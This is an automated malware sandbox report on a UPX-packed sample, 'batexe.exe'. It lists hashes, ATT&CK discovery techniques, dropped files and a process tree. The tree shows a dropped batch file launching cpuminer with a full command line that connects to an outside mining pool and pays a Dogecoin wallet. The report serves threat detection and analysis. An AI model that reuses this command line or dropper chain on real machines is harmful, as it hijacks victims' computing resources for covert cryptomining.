73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
14/02/2024, 07:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2572	b2e.exe
5020	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5020	cpuminer-sse2.exe
5020	cpuminer-sse2.exe
5020	cpuminer-sse2.exe
5020	cpuminer-sse2.exe
5020	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4432-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4432 wrote to memory of 2572	4432	batexe.exe	85
PID 4432 wrote to memory of 2572	4432	batexe.exe	85
PID 4432 wrote to memory of 2572	4432	batexe.exe	85
PID 2572 wrote to memory of 1556	2572	b2e.exe	86
PID 2572 wrote to memory of 1556	2572	b2e.exe	86
PID 2572 wrote to memory of 1556	2572	b2e.exe	86
PID 1556 wrote to memory of 5020	1556	cmd.exe	89
PID 1556 wrote to memory of 5020	1556	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4432
- C:\Users\Admin\AppData\Local\Temp\B92E.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\B92E.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B92E.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BC89.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1556
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B92E.tmp\b2e.exe

Filesize
14.2MB

MD5
05cb4bc7ea908b07584d3dcd93486805

SHA1
9b1ff3d01c3505ab9bb59d1c82180b92668d15c6

SHA256
6818a507169d316e29e07e441a0ef7523814d5f23c6aaf056a9cb28bb50c0f2c

SHA512
1d9b895900f34653be5d82982ad0b4a992683baf13c943f32439df1d8fab28cbe661cc3a79bfb1e92a1bb60f31110eed88207fb5d97d2192b0aff3a23dc7447d

Download Submit
C:\Users\Admin\AppData\Local\Temp\B92E.tmp\b2e.exe

Filesize
3.5MB

MD5
70e7e1875e8f4ec7b64fc4fccf2e8bc8

SHA1
94d5f094636105721308f6eeb5fdab856605dfdd

SHA256
120368a73380b6697b3aef5e01e2aba24b7d4e349bf2304140c5ef8f67cb024d

SHA512
0787baebeaf584f7b6ebaaa48334e22c9a4937dedf573fcb4702995c89756c483863ce92d4c88ba1d6a0374dae9c09f92e570eb153cc473d59a50f4822664e49

Download Submit
C:\Users\Admin\AppData\Local\Temp\B92E.tmp\b2e.exe

Filesize
4.6MB

MD5
7d7868459691a2c328873b785a431e5c

SHA1
6c3ff9e0d21a95df0900c498d1bd6b29b6a780d9

SHA256
fc1461f288f8798085b382f92a49c1f41127d18a15ff96d5c772f58a34c032c5

SHA512
e6cd8ff58d9b05ea241678f213047b679b1df9787d5f3608015764a4bf3b46bfb6c76e6b6c7407cde0c1200d5c95720a602a857710b3fe615990f4cab5269b63

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC89.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
319KB

MD5
8726b2bc6a1db8fb2b6364918efbad0d

SHA1
1e5afbe70d1cdb7a9a784c62ac466ae25d5ffb76

SHA256
ebc45b2f69ee7191fc34b83ad46c888abb2dee61b16786a4ab068fb8ce27d1d5

SHA512
7043f7dff1df4bd65f907c5476edb61359df7d1609c9b02be5e51f64242e89a05c12d093acbc6727f6c61e219e22c1958cd97eaf5f77acd1065edb9e2f82d704

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
431KB

MD5
d73d4c6d748d263fadf11ac5675d552d

SHA1
1c274a824d8091ab9f439b465f889f51a946f0e4

SHA256
76e3fe02592e84c616aed3dcb47007cc4ef769ff8f93b83633e6a3142fd8eeb0

SHA512
dbdd56ee2aa7fbdcf3847d0bd358dfab5ac080540c883797dd412b09182085779c53f9f9eb8fca13600650077d8c5efc68ddf84b825b9db0b4238059a6bb022a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
333KB

MD5
3e17d5661ddfbfdfa34b8569c5412cc3

SHA1
189323a9c8552909184d0273ed41174272e136bb

SHA256
927538cada4c63820334d6dca6026222612eebd11e07fa6e1f3508098afd4849

SHA512
7b2e614a8764760ac158ae5749b00479ed7ba8a12698781805c27e3feeb108afef6d2a8a5ce47d563104457e4fbccaaeaa9e04b9b1386d9f1d6a35896d8fae8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
262KB

MD5
8a1ca10f8fd971d97e6d125b3ced7f88

SHA1
b4d3cf274e4a39b0046356f22c625501c61bf534

SHA256
67cad728254fe7df16269375e5212d61e154f2fbfcb70bfba5d5c3ec3338ae25

SHA512
e51a6aed31951f4475d6d91958af9b03b8bb90b0a7082c04dd04b7769912641a21eb2c9a20e5c047f83d623624cc39287452a6030a6eaafe02dba8bce9bf456e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
655KB

MD5
3013647e384ac5f2cb767466902c8514

SHA1
fcddb0f7bea77b2166ba9705848e7e32f3471cfa

SHA256
42826a064e5dbecd3cce6f6b55d591e29fb7ddeeb8fa788faca44eef62c1e762

SHA512
7b4655e9a0d1e5118af85abaf364136e5215afbfabe9def8d8a4c83aaf2ae4db5cd0e1eb542f351df8f6257db0b95d951d69a9713d900a90b78944f9d937c935

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
430KB

MD5
9e8dc19c27cffae1455231e99d2b9e9a

SHA1
9b55bb89eb154df0575a4af82922df6ca60f1ed4

SHA256
33b2ad19947dcfb2eb92128c6ca82bedba507f65b7bc0a4ad161f6e093741f5c

SHA512
f40ecbb6dedc65832a9bc31050e88db1afb128887d677ac6f7c3ed78584a6cdbe2178c77079bd0099d2e74b8e2a2df37f87edcaa70b22d9e9137ae2bee33a699

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
399KB

MD5
c32c95d2e0a1448e4ba8e8c877e3d586

SHA1
13aae8709e30e044dc37a2a740f3481de79c9a07

SHA256
82405447a4ef92721eb4bb983638651dd36522de9dc158f5074ece68884b4a06

SHA512
7570a3bbee5d27a4ab3fa7790828812938b863d85e1148873184a1098ae264b7f68ee0a42fc41d7b1fdfaaaf8ec7685540396e86d0d12c2fa5ab06dda52142bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
211KB

MD5
655ff447401944dec64886bef671b000

SHA1
076db1b50d04120fc63ef1940be5c7bd11526e2b

SHA256
f90bdfb65e402c611faa33e2d966e65c8f50b6b264ddcb7f61823ba93c02220f

SHA512
0ff00306d5bd7b5988727f951d032a46d8d918b39c6d75320db5c728c4d51ceac2b27fd7c73148ff8f0c634a1f06e8d0420060d010e6108ae4201c3f1cec1d6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
95KB

MD5
eeee99a2b75d3d360bbaa2c58a801757

SHA1
7462747dbde135633d3f57fca2d8bc7aac220982

SHA256
9f56116050c27ce815202dc990a94da1b6baae61524d1e668127b6a9e8bc16a6

SHA512
fd9185f7bb9a66e90da0cfa979e3eebd168598c0333a835250a2121fd0d53ac4a38cdaa702ea3398fcc169690d32aead7c41f15fd7bfdca4c609c26d89ba7b27

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
64KB

MD5
6cccf65bd7d7ff5b53aeb882e15c462c

SHA1
a9822b63ad70c6085ed1deda0fbe4bc5fe555f3d

SHA256
1379cd6111c2c37cf16f2dd9b325118513e85c35543ba45e79deb504dd4c01d2

SHA512
c174b5f8615131c2b86c57aee166744ee1fe02ff7c916195f2fde06684f467545a3fa4f88083335e2045d12727d774279dc8672ec352de3095b729aa5d1dedcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
154KB

MD5
79e5a85100e718700d43e30564c8b306

SHA1
da6ae64256e3d7f3de052961524126330cbcbc16

SHA256
d7da33dc919ad61953f03851f1e7f7f67ab5829de4cb903ebdd3137e5bc2f53f

SHA512
d4bc7cd7bfe08dc6ba6333641acce7930dd69bb5951aaa73a5ced0f443bcd0d190d87cdc418de268a917bf33714d4e8c3e7226c256e3447f2eb55401a6eea29e

Download Submit
memory/2572-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2572-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4432-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5020-47-0x00000000010F0000-0x00000000029A5000-memory.dmp

Filesize
24.7MB

Download
memory/5020-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5020-46-0x0000000073A60000-0x0000000073AF8000-memory.dmp

Filesize
608KB

Download
memory/5020-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5020-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5020-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5020-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5020-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5020-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5020-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5020-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5020-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5020-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download